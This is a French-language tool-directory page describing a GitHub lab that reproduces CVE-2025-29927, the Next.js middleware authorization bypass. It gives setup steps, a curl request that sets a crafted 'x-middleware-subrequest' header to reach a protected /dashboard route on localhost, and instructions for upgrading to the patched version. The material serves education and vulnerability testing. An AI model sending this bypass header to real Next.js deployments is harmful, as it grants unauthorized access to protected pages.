Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-29927-lab — Laboratoire de reproduction pour CVE-2025-29927 — contournement de l'autorisation du middleware Next.js (CVSS 9.1) | Kitploit
Outils/GitHubGitHub/swapnildeshpande/cve-2025-29927-lab
Analyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et ÉducationLabs et Pratique
GitHubswapnildeshpande/cve-2025-29927-lab

cve-2025-29927-lab

Laboratoire de reproduction pour CVE-2025-29927 — contournement de l'autorisation du middleware Next.js (CVSS 9.1)

Voir le dépôt
42il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Laboratoire CVE-2025-29927

Laboratoire minimal de reproduction pour CVE-2025-29927 — contournement de l'autorisation du middleware Next.js (CVSS 9.1).

Complément de : Analyse N-Day sur Medium

Ce que c'est

Une application Next.js 15.2.2 (vulnérable) avec une route /dashboard protégée par cookie. La vérification d'authentification du middleware peut être contournée en envoyant un seul en-tête HTTP — aucune information d'identification requise.

Prérequis

  • Node.js 18+

Configuration

root@kitploit:~
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001

Reproduire le contournement

Étape 1 — Confirmer que le middleware bloque les requêtes non authentifiées :
root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307

Étape 2 — Contourner le middleware avec l'en-tête de sous-requête :

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200

Étape 3 — Mettre à jour vers la version corrigée et confirmer que le contournement est bloqué :

root@kitploit:~
npm install [email protected]
# Redémarrez le serveur de développement, puis répétez l'étape 2
# → 307

Routes de l'application

RouteAccès
/Publique
/loginPublique
/dashboardProtégée par le middleware (nécessite le cookie session)

Versions affectées

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

Références

  • NVD — CVE-2025-29927
  • Correctif Next.js PR #77201
  • Source vulnérable — sandbox.ts
Télécharger l’outil